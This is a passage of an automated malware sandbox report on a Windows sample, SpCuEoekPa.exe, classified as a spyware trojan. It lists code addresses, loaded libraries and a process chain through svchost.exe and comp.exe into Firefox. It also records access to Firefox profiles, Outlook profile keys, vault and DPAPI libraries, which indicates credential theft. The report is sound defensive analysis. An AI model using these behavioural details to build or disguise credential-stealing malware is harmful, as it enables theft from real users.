                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383ADE03_2_0383ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384AD003_2_0384AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DCD1F3_2_038DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0CB53_2_038E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830CF23_2_03830CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840C003_2_03840C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0388739A3_2_0388739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F132D3_2_038F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382D34C3_2_0382D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038452A03_2_038452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385B2C03_2_0385B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E12ED3_2_038E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384B1B03_2_0384B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387516C3_2_0387516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382F1723_2_0382F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0390B16B3_2_0390B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EF0CC3_2_038EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038470C03_2_038470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F70E93_2_038F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FF0E03_2_038FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FF7B03_2_038FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038317EC3_2_038317EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F16CC3_2_038F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DD5B03_2_038DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F75713_2_038F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FF43F3_2_038FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038314603_2_03831460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385FB803_2_0385FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B5BF03_2_038B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387DBF93_2_0387DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFB763_2_038FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DDAAC3_2_038DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03885AA03_2_03885AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E1AA33_2_038E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EDAC63_2_038EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFA493_2_038FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F7A463_2_038F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B3A6C3_2_038B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D59103_2_038D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038499503_2_03849950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385B9503_2_0385B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038438E03_2_038438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AD8003_2_038AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03841F923_2_03841F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFFB13_2_038FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFF093_2_038FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03849EB03_2_03849EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385FDC03_2_0385FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03843D403_2_03843D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F1D5A3_2_038F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F7D733_2_038F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFCF23_2_038FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B9C323_2_038B9C32
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305A3527_2_0305A352
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030603E67_2_030603E6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FAE3F07_2_02FAE3F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030402747_2_03040274
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030202C07_2_030202C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0303A1187_2_0303A118
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030281587_2_03028158
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030541A27_2_030541A2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030601AA7_2_030601AA
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030581CC7_2_030581CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030320007_2_03032000
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F901007_2_02F90100
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FBC6E07_2_02FBC6E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F9C7C07_2_02F9C7C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA07707_2_02FA0770
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FC47507_2_02FC4750
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030605917_2_03060591
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030444207_2_03044420
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030524467_2_03052446
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA05357_2_02FA0535
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0304E4F67_2_0304E4F6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305AB407_2_0305AB40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F9EA807_2_02F9EA80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_03056BD77_2_03056BD7
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FCE8F07_2_02FCE8F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F868B87_2_02F868B8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0306A9A67_2_0306A9A6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FAA8407_2_02FAA840
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA28407_2_02FA2840
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA29A07_2_02FA29A0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FB69627_2_02FB6962
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_03042F307_2_03042F30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_03014F407_2_03014F40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FB2E907_2_02FB2E90
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0301EFA07_2_0301EFA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA0E597_2_02FA0E59
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FACFE07_2_02FACFE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305EE267_2_0305EE26
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F92FC87_2_02F92FC8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305CE937_2_0305CE93
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FC0F307_2_02FC0F30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FE2F287_2_02FE2F28
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305EEDB7_2_0305EEDB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F90CF27_2_02F90CF2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0303CD1F7_2_0303CD1F
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA0C007_2_02FA0C00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F9ADE07_2_02F9ADE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FB8DBF7_2_02FB8DBF
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_03040CB57_2_03040CB5
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FAAD007_2_02FAAD00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305132D7_2_0305132D
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FBB2C07_2_02FBB2C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA52A07_2_02FA52A0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FE739A7_2_02FE739A
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F8D34C7_2_02F8D34C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030412ED7_2_030412ED
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA70C07_2_02FA70C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0306B16B7_2_0306B16B
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FAB1B07_2_02FAB1B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F8F1727_2_02F8F172
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD516C7_2_02FD516C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0304F0CC7_2_0304F0CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305F0E07_2_0305F0E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030570E97_2_030570E9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305F7B07_2_0305F7B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FE56307_2_02FE5630
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F917EC7_2_02F917EC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030516CC7_2_030516CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030575717_2_03057571
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F914607_2_02F91460
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0303D5B07_2_0303D5B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030695C37_2_030695C3
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305F43F7_2_0305F43F
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FE5AA07_2_02FE5AA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305FB767_2_0305FB76
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_03015BF07_2_03015BF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FDDBF97_2_02FDDBF9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_03057A467_2_03057A46
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305FA497_2_0305FA49
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_03013A6C7_2_03013A6C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FBFB807_2_02FBFB80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_03041AA37_2_03041AA3
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0303DAAC7_2_0303DAAC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0304DAC67_2_0304DAC6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_030359107_2_03035910
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA38E07_2_02FA38E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0300D8007_2_0300D800
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA99507_2_02FA9950
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FBB9507_2_02FBB950
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305FF097_2_0305FF09
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA9EB07_2_02FA9EB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305FFB17_2_0305FFB1
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F63FD57_2_02F63FD5
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F63FD27_2_02F63FD2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA1F927_2_02FA1F92
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_03051D5A7_2_03051D5A
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_03057D737_2_03057D73
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_03019C327_2_03019C32
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FBFDC07_2_02FBFDC0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FA3D407_2_02FA3D40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0305FCF27_2_0305FCF2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_00681C007_2_00681C00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0067CB287_2_0067CB28
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0067CB307_2_0067CB30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0067CD507_2_0067CD50
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0067AD307_2_0067AD30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0067AE747_2_0067AE74
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0067AE807_2_0067AE80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_006852607_2_00685260
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_006834607_2_00683460
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0069B9107_2_0069B910
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02CFE6EB7_2_02CFE6EB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02CFE4657_2_02CFE465
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02CFE5837_2_02CFE583
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02CFD9E87_2_02CFD9E8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02CFE91C7_2_02CFE91C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02CFCC837_2_02CFCC83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 100 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 283 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: String function: 00388900 appears 42 times
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: String function: 00367DE1 appears 36 times
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: String function: 00380AE3 appears 70 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 02FD5130 appears 58 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 0300EA12 appears 86 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 02FE7E54 appears 109 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 02F8B970 appears 283 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 0301F290 appears 105 times
                Source: SpCuEoekPa.exe, 00000000.00000003.1297362517.000000000421D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SpCuEoekPa.exe
                Source: SpCuEoekPa.exe, 00000000.00000003.1297640761.0000000004073000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SpCuEoekPa.exe
                Source: SpCuEoekPa.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@8/8
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CA06A GetLastError,FormatMessageW,0_2_003CA06A
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003B81CB AdjustTokenPrivileges,CloseHandle,0_2_003B81CB
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003B87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003B87E1
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003CB333
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003DEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_003DEE0D
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003D83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_003D83BB
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00364E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00364E89
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeFile created: C:\Users\user\AppData\Local\Temp\aut3CC6.tmpJump to behavior
                Source: SpCuEoekPa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3151190257.0000000002A94000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1879715022.0000000002A9E000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3151190257.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1875930000.0000000002A94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SpCuEoekPa.exeVirustotal: Detection: 52%
                Source: SpCuEoekPa.exeReversingLabs: Detection: 71%
                Source: unknownProcess created: C:\Users\user\Desktop\SpCuEoekPa.exe "C:\Users\user\Desktop\SpCuEoekPa.exe"
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SpCuEoekPa.exe"
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeProcess created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"
                Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SpCuEoekPa.exe"Jump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeProcess created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SpCuEoekPa.exeStatic file information: File size 1192448 > 1048576
                Source: SpCuEoekPa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: SpCuEoekPa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: SpCuEoekPa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: SpCuEoekPa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: SpCuEoekPa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: SpCuEoekPa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: SpCuEoekPa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: comp.pdb source: svchost.exe, 00000003.00000003.1648152709.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681342325.0000000003200000.00000004.00000020.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151641989.0000000001108000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OGbZSCDMTTWQqW.exe, 00000006.00000000.1602038469.000000000077E000.00000002.00000001.01000000.00000006.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757528049.000000000077E000.00000002.00000001.01000000.00000006.sdmp
                Source: Binary string: comp.pdbGCTL source: svchost.exe, 00000003.00000003.1648152709.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681342325.0000000003200000.00000004.00000020.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151641989.0000000001108000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: SpCuEoekPa.exe, 00000000.00000003.1298683128.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1297793424.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586870712.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1584678539.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.000000000399E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1681119916.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1686241568.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp
